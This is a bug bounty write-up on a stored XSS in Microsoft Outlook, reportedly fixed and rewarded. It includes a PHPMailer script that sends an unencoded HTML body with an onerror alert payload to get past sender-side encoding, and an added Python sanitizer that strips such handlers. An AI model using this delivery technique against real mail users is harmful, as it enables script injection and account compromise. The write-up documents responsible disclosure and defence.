Microsoft Outlook stored XSS write-up ($3000)

Staying home is a real nightmare for me and I am too bored to learn new things. So I decided to write a write-up about how I found a stored XSS in Microsoft Outlook and got a $3000 bounty.

I stopped hunting bugs about three years ago, after I got some bounties from Yahoo, Tumblr, etc. A few months ago, an old payload I had tested on Shopify popped up in my Microsoft Outlook email. So I started to dig around: I sent every XSS payload I had, including polyglots, to my Microsoft account, but nothing showed an alert. After hours of struggling, I reported to MSRC with the message below, lol. I thought I was an idiot.

And as expected, MSRC replied that they needed more info. I knew there was an XSS bug in Microsoft Outlook; I just hadn't found the endpoint. After thinking for some hours, I started wondering: what if the sending email client validates and encodes my payload? If my payload is normalized on the sender side, there is no vulnerable point left on the receiver side, which is Microsoft Outlook.

So I decided to write a simple PHP script to send my message to Outlook.

The script I used to send the XSS payload to Outlook is below.

<?php
// Sends a raw, unencoded HTML body via PHPMailer over SMTP, bypassing the
// encoding a normal mail client would apply. Credentials are placeholders.
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require 'vendor/autoload.php';
$mail = new PHPMailer(true);
try {
    //Server settings
    $mail->SMTPDebug = 2;                       // verbose SMTP transcript
    $mail->isSMTP();
    $mail->Host = 'smtp.gmail.com';
    $mail->SMTPAuth = true;
    $mail->Username = 'mymail@gmail.com';
    $mail->Password = 'mypassword';
    $mail->SMTPSecure = 'tls';                  // STARTTLS on port 587
    $mail->Port = 587;
    //Recipients
    $mail->setFrom('mymail@gmail.com', 'kmt');
    $mail->addAddress('receiver@outlook.com', '');
    //Content
    $mail->isHTML(true);                        // body is sent as text/html as-is
    $mail->Subject = 'XSS POC';
    $mail->Body = "<img src=x onerror=alert(1)>";
    $mail->send();
    echo 'Message has been sent';
} catch (Exception $e) {
    echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
}
?>

After firing the script and watching my Outlook mailbox: boom, XSS, and it seems Office 365 is also affected.

After the bug was fixed, I was awarded $3000 by MSRC.

Conclusion

In the above scenario, I strongly believe my sending email client encoded my payload before it reached Outlook, which is why there was no XSS in Outlook at first. That is why I chose to write a simple PHP script with PHPMailer.
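The receiver is the only place that can make an unencoded HTML body like the one above harmless. As an added example (not from the original post and not Outlook's own code), here is a standard-library Python allowlist sanitizer of the kind a mail client should apply before rendering: it drops every on* handler such as onerror, rejects href/src values without a safe scheme, and discards script/style content. The tag and attribute allowlists and SAMPLE_BODY are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "img", "div", "span", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


class EmailHtmlSanitizer(HTMLParser):
    """Allowlist sanitizer for an HTML mail body (hypothetical helper, not Outlook's
    code): keeps only listed tags/attributes, drops every on* handler, requires a
    safe scheme on href/src and discards the content of <script>/<style>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = []
            for name, value in attrs:  # HTMLParser already lowercases names
                value = value or ""
                if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                    continue  # onerror & co. and non-allowlisted attributes go
                if name in ("href", "src") and not value.strip().lower().startswith(SAFE_SCHEMES):
                    continue  # javascript:, data:, vbscript: and the bare "x" go
                kept.append(f' {name}="{escape(value)}"')
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS - {"br", "img"}:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))  # text is re-escaped on output


def sanitize_html(html):
    parser = EmailHtmlSanitizer()
    parser.feed(html)
    parser.close()  # flush any buffered text
    return "".join(parser.out)


# Constructed body in the shape the write-up's PHPMailer script sends, plus a script.
SAMPLE_BODY = "<p>Hi</p><img src=x onerror=alert(1)><script>alert(2)</script>"
```

Running sanitize_html(SAMPLE_BODY) yields `<p>Hi</p><img>`: the image survives but its handler and bogus source do not.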
